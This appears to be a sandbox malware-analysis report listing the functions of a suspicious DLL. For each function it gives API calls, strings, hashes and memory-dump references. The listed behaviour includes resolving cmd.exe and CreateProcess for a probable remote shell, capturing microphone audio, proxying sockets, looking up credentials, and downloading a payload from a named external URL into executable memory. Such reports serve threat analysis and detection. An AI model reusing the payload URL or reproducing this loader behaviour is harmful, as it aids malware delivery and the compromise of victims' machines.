                                                          • Instruction Fuzzy Hash: 6E910235A41358ABEB14CBA4DC88BEEBFB5EF19710F580258F80A772C2C7751A41CB65
                                                          Function 100216E0 Relevance: 47.6, APIs: 11, Strings: 16, Instructions: 331libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 100109B0: LoadLibraryA.KERNEL32(KERNEL32.dll,CreateEventA,?,?,1000F32E,?,?,00000000,1001DC8E,?,100FA3E4,?), ref: 100109D0
                                                            • Part of subcall function 100109B0: GetProcAddress.KERNEL32(00000000), ref: 100109D7
                                                          • LoadLibraryA.KERNEL32 ref: 1002176D
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021776
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,GetSystemDirectoryA), ref: 10021786
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021789
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,CreatePipe), ref: 10021799
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002179C
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,GetStartupInfoA), ref: 100217AC
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100217AF
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,CreateProcessA), ref: 100217BF
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100217C2
                                                          • WaitForInputIdle.USER32(?,000000FF), ref: 10021998
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$IdleInputWait
                                                          • String ID: C$CreatePipe$CreateProcessA$D$GetStartupInfoA$GetSystemDirectoryA$H$KERNEL32.dll$\cmd.exe$a$dnaH$n$o$s$x32$x64
                                                          • API String ID: 2019908028-49846795
                                                          • Opcode ID: a11154c452e8f8ca2bbd37bacc63169b39e844789c8680e5a122f9f1d25584d2
                                                          • Instruction ID: d2156f82375759501e581fc1ef989f192f098b0fc37ec42ae3431b591a90c868
                                                          • Opcode Fuzzy Hash: a11154c452e8f8ca2bbd37bacc63169b39e844789c8680e5a122f9f1d25584d2
                                                          • Instruction Fuzzy Hash: 8BC1AE75608384AFC724CF24C880B9BBBE5EFD9710F50492DF58997280DB749945CB96
                                                          Function 1002AEC0 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 309stringmemorycomCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoInitialize.OLE32 ref: 1002AED3
                                                          • CoCreateInstance.OLE32(100B7A14,00000000,00000001,100B7A34,?), ref: 1002AEEC
                                                          • LocalAlloc.KERNEL32(00000040,00002710), ref: 1002AEFB
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 1002AF92
                                                          • #823.MFC42(00000000), ref: 1002AFA5
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 1002AFC0
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 1002AFDD
                                                          • #823.MFC42(00000000), ref: 1002AFED
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 1002B008
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 1002B016
                                                          • wsprintfA.USER32 ref: 1002B066
                                                          • lstrlenA.KERNEL32(00000000), ref: 1002B070
                                                          • lstrlenA.KERNEL32(?), ref: 1002B079
                                                          • lstrlenA.KERNEL32(?), ref: 1002B082
                                                          • LocalSize.KERNEL32(?), ref: 1002B094
                                                          • LocalReAlloc.KERNEL32(?,00000000,00000042), ref: 1002B0A2
                                                          • lstrlenA.KERNEL32(?), ref: 1002B0B1
                                                          • lstrlenA.KERNEL32(?), ref: 1002B0D8
                                                          • lstrlenA.KERNEL32(00000000), ref: 1002B0E7
                                                          • lstrlenA.KERNEL32(00000000), ref: 1002B103
                                                          • lstrlenA.KERNEL32(?), ref: 1002B116
                                                          • lstrlenA.KERNEL32(?), ref: 1002B134
                                                          • #825.MFC42(00000000), ref: 1002B17B
                                                          • #825.MFC42(?), ref: 1002B1C0
                                                          • CoUninitialize.OLE32 ref: 1002B1F5
                                                          • LocalReAlloc.KERNEL32(00000000,00000001,00000042), ref: 1002B203
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$ByteCharLocalMultiWide$Alloc$#823#825Time$CreateFileInitializeInstanceSizeSystemUninitializewsprintf
                                                          • String ID: %d-%d-%d %d:%d:%d
                                                          • API String ID: 1491319390-2068262593
                                                          • Opcode ID: 1b83c80fe2a63424a2d4bff5dae57cfa6ee10cf1f52e7d96517ebe19a1b71b17
                                                          • Instruction ID: af968043ba8b2913ef9a19756fa2208ce54cb015f96bc4872ac0b3bef0e4c24a
                                                          • Opcode Fuzzy Hash: 1b83c80fe2a63424a2d4bff5dae57cfa6ee10cf1f52e7d96517ebe19a1b71b17
                                                          • Instruction Fuzzy Hash: 38A1AF75208302AFD310CF24DC91B6BB7E9EF89710F944A28F995A7391DA75E8098792
                                                          Function 10023710 Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 250networksynchronizationthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(1012C4E8), ref: 1002371C
                                                          • LeaveCriticalSection.KERNEL32(1012C4E8), ref: 10023734
                                                          • malloc.MSVCRT ref: 1002374D
                                                          • malloc.MSVCRT ref: 10023756
                                                          • malloc.MSVCRT ref: 1002375F
                                                          • recv.WS2_32 ref: 100237C6
                                                          • send.WS2_32 ref: 10023846
                                                          • getpeername.WS2_32(?,?,?), ref: 1002387B
                                                          • inet_addr.WS2_32(00000000), ref: 10023888
                                                          • inet_addr.WS2_32(00000000), ref: 100238A2
                                                          • htons.WS2_32(?), ref: 100238AD
                                                          • send.WS2_32 ref: 100238EF
                                                          • CreateThread.KERNEL32(00000000,00000000,10023D00,?,00000000,?), ref: 1002392E
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1002393F
                                                            • Part of subcall function 100234D0: htons.WS2_32 ref: 100234F3
                                                            • Part of subcall function 100234D0: inet_addr.WS2_32(?), ref: 10023509
                                                            • Part of subcall function 100234D0: inet_addr.WS2_32(?), ref: 10023527
                                                            • Part of subcall function 100234D0: socket.WS2_32(00000002,00000001,00000006), ref: 10023533
                                                            • Part of subcall function 100234D0: setsockopt.WS2_32 ref: 1002355E
                                                            • Part of subcall function 100234D0: connect.WS2_32(?,?,00000010), ref: 1002356E
                                                            • Part of subcall function 100234D0: closesocket.WS2_32 ref: 1002357C
                                                          • send.WS2_32(?,?,00000008,00000000), ref: 10023990
                                                          • CreateThread.KERNEL32(00000000,00000000,10023F60,?,00000000,?), ref: 100239BD
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,00000008,00000000), ref: 100239CA
                                                            • Part of subcall function 100232C0: gethostbyname.WS2_32(?), ref: 100232C5
                                                          • closesocket.WS2_32(00000000), ref: 100239D9
                                                          • closesocket.WS2_32(?), ref: 100239DF
                                                          • free.MSVCRT ref: 100239E8
                                                          • free.MSVCRT ref: 100239EB
                                                          • free.MSVCRT ref: 100239F2
                                                          • free.MSVCRT ref: 100239F5
                                                            • Part of subcall function 10022E40: EnterCriticalSection.KERNEL32(1012C4E8), ref: 10022E6A
                                                            • Part of subcall function 10022E40: LeaveCriticalSection.KERNEL32(1012C4E8), ref: 10022E82
                                                            • Part of subcall function 10022E40: send.WS2_32(?,HTTP/1.0 200 OK,?,00000000), ref: 10022F1E
                                                            • Part of subcall function 10022E40: CreateThread.KERNEL32(00000000,00000000,10023F60,?,00000000,?), ref: 10022FBC
                                                            • Part of subcall function 10022E40: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,00000000), ref: 10022FC9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSectionfreeinet_addrsend$CreateObjectSingleThreadWaitclosesocketmalloc$EnterLeavehtons$connectgethostbynamegetpeernamerecvsetsockoptsocket
                                                          • String ID: [
                                                          • API String ID: 3942976521-784033777
                                                          • Opcode ID: 3a2268755cef6764fc649d5fa3a3f983a899e33ae9e3db57bf8fbebbe5547fd3
                                                          • Instruction ID: e9549ad0dd3f4253299fe20122cfa47d020b0e4884b45b3b790ec5c0bf8e8527
                                                          • Opcode Fuzzy Hash: 3a2268755cef6764fc649d5fa3a3f983a899e33ae9e3db57bf8fbebbe5547fd3
                                                          • Instruction Fuzzy Hash: 7981F270608344AFE310DB68DC85B5BBBE8EFC5754F548A1EF58983390E7B1E8448B62
                                                          Function 10020810 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 150networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetOpenA.WININET(DownloadApp,00000001,00000000,00000000,00000000), ref: 1002082B
                                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6D49A3D8,1011F9A8,?,?,1002128D,?,00000001,?,?,00000001), ref: 10020846
                                                          • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,80000000,00000000), ref: 10020871
                                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6D49A3D8,1011F998,?,?,?,1002128D,?,00000001,?,?,00000001), ref: 1002088A
                                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(00000000,?,00000001), ref: 10020894
                                                          • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,00000000,?,00000001), ref: 1002089A
                                                          • InternetCloseHandle.WININET(00000000), ref: 100208A4
                                                          • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,00000000,?,00000001), ref: 100209B0
                                                          Strings
                                                          • https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt, xrefs: 1002081D
                                                          • DownloadApp, xrefs: 10020826
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: U?$char_traits@$V?$basic_ostream@$??6std@@D@std@@@0@InternetV10@$?endl@std@@D@std@@@1@OpenV21@@$CloseD@2@@0@@D@std@@HandleV?$allocator@V?$basic_string@
                                                          • String ID: DownloadApp$https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt
                                                          • API String ID: 2470020359-224967001
                                                          • Opcode ID: 32d36391f2d7d4904f82a27f97c872808f4ad89287abde04870944640ee7d5a7
                                                          • Instruction ID: 56cbb8ff2905a2750e3cd2c2d1ffd8e82e618ae840f826ece4bff099c8b17c2b
                                                          • Opcode Fuzzy Hash: 32d36391f2d7d4904f82a27f97c872808f4ad89287abde04870944640ee7d5a7
                                                          • Instruction Fuzzy Hash: E741E439600315BBF210EB74DC85FEB37ECFB48B51F080619FE48E6191D674A9048B65
                                                          Function 100015A0 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 132libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,ResumeThread,00000000,?,00000000,771AF550), ref: 100015B9
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100015C2
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,CreateThread,?,00000000,771AF550), ref: 100015D2
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100015D5
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveInOpen,?,00000000,771AF550), ref: 100015E5
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100015E8
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveInGetNumDevs,?,00000000,771AF550), ref: 100015F8
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100015FB
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveInPrepareHeader,?,00000000,771AF550), ref: 10001609
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000160C
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveInAddBuffer,?,00000000,771AF550), ref: 1000161C
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000161F
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveInStart,?,00000000,771AF550), ref: 1000162F
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10001632
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: CreateThread$KERNEL32.dll$ResumeThread$WINMM.dll$waveInAddBuffer$waveInGetNumDevs$waveInOpen$waveInPrepareHeader$waveInStart
                                                          • API String ID: 2574300362-1356117283
                                                          • Opcode ID: b16c15dad6be20392214e3733c7d2997f9670e9390d019f32002513cfd113147
                                                          • Instruction ID: 9f0f930b95cd2c35929b0060be92cf7d2e31dda6e2d7e4543e4cf746f9a0d286
                                                          • Opcode Fuzzy Hash: b16c15dad6be20392214e3733c7d2997f9670e9390d019f32002513cfd113147
                                                          • Instruction Fuzzy Hash: 97414CB5900308ABDB10EFA5DC88E9BBBA8EF89350F15095AFA4497201D739E545CBA1
                                                          Function 10002060 Relevance: 39.2, APIs: 26, Instructions: 212memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,00000100), ref: 1000206D
                                                          • GlobalLock.KERNEL32(00000000), ref: 1000208C
                                                          • GlobalFree.KERNEL32(00000000), ref: 10002099
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Global$AllocFreeLock
                                                          • String ID:
                                                          • API String ID: 1811133220-0
                                                          • Opcode ID: ad7f2aed513f67e62ba89c4c6e811acdb24dde1641cf500df862e188d5b8eadf
                                                          • Instruction ID: 0a32fddf0529b7f81130ae60a00d4a3e16a3ce89216675909d7529b56b8ea342
                                                          • Opcode Fuzzy Hash: ad7f2aed513f67e62ba89c4c6e811acdb24dde1641cf500df862e188d5b8eadf
                                                          • Instruction Fuzzy Hash: 1671C276610301ABD310CF54CC89F9AB3B4FF54714F569608E608AF2B1E3B8E549C76A
                                                          Function 100211C0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 200windowfilesleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _access.MSVCRT ref: 100211E6
                                                          • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1002121E
                                                          • ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 10021244
                                                          • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt,?,?,00000001), ref: 10021276
                                                          • #825.MFC42(?,?,00000001), ref: 100212AC
                                                          • #825.MFC42(?,?,00000001), ref: 100212D9
                                                          • Sleep.KERNEL32(000000C8), ref: 100212E6
                                                          • CreateFileA.KERNEL32(C:\Users\Public\Documents\MM\7.txt,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10021301
                                                          • MessageBoxA.USER32(00000000,1011FA00,1011FA10,00000000), ref: 1002131C
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 10021328
                                                          • MessageBoxA.USER32(00000000,1011F9EC,1011FA10,00000000), ref: 10021343
                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 10021358
                                                          • MessageBoxA.USER32(00000000,1011F9DC,1011FA10,00000000), ref: 10021375
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10021384
                                                          • CloseHandle.KERNEL32(00000000), ref: 10021394
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 100213AC
                                                          • CloseHandle.KERNEL32(00000000), ref: 100213EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: D@2@@std@@D@std@@FileMessageU?$char_traits@V?$allocator@$#825CloseHandleVirtual$?assign@?$basic_string@AllocCreateEos@?$basic_string@FreeGrow@?$basic_string@ReadSizeSleepV12@_access
                                                          • String ID: C:\Users\Public\Documents\MM\7.txt$https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt$runas
                                                          • API String ID: 1859234541-2290419671
                                                          • Opcode ID: c5a9ce1c4aaa493cda920053318a96be974c375f583f32f6d80e8228b9abdc2e
                                                          • Instruction ID: 85d187001e9454c1b90a95d0aec33d3ebb7e4a2eafac0ed4a4c13b68bd4555e4
                                                          • Opcode Fuzzy Hash: c5a9ce1c4aaa493cda920053318a96be974c375f583f32f6d80e8228b9abdc2e
                                                          • Instruction Fuzzy Hash: 30611638A04654ABD714CBA8EC89BDEBBB4FF29710F540229F909B72C0CB745A44CB64
                                                          Function 10005310 Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 110libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,FreeLibrary,?,L$_RasDefaultCredentials#0,00000000), ref: 1000532C
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005335
                                                          • LoadLibraryA.KERNEL32 ref: 10005386
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005389
                                                          • LoadLibraryA.KERNEL32(?,IsValidSid), ref: 10005397
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000539A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: .23$2$3$ConvertSidToStringSidA$D$FreeLibrary$I$IsValidSid$L$_RasDefaultCredentials#0$LookupAccountNameA$P$V$kernel32.dll
                                                          • API String ID: 2574300362-2447002180
                                                          • Opcode ID: 0e49161b9a27eb155e0ea2c7e22d683dee310b1aad9c37f06d238c71156bed93
                                                          • Instruction ID: 223027d79037198c63e6ca2b5f055af27ccc184e3b8335a544396f1f5ed8738e
                                                          • Opcode Fuzzy Hash: 0e49161b9a27eb155e0ea2c7e22d683dee310b1aad9c37f06d238c71156bed93
                                                          • Instruction Fuzzy Hash: D631A472108385AED300DB68DC44AEFBFD8EFD5255F440A5EF58482241D7A9D60C8BB3
                                                          Function 10008110 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 156windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #354.MFC42(?,0000000C,?,?,?,?,?,?,00000000), ref: 10008140
                                                          • #5186.MFC42 ref: 1000815A
                                                          • #665.MFC42 ref: 1000816F
                                                          • #540.MFC42(?), ref: 1000818F
                                                          • #537.MFC42(?,?), ref: 1000819E
                                                          • #4204.MFC42(?,?), ref: 100081DA
                                                          • #2915.MFC42(00000080,?,?), ref: 100081EA
                                                          • #5442.MFC42(00000000,?,00000080,?,?), ref: 10008231
                                                          • #5572.MFC42(00000000,00000000,?,00000080,?,?), ref: 10008240
                                                          • #6874.MFC42(00000000,00000000,00000000,?,00000080,?,?), ref: 1000824B
                                                          • #4204.MFC42(00000000,00000000,00000000,?,00000080,?,?), ref: 10008254
                                                          • #2764.MFC42(00000000,00000000,00000000,00000000,?,00000080,?,?), ref: 10008262
                                                          • MessageBoxA.USER32(00000000,100FA624,warning,00000000), ref: 100082AA
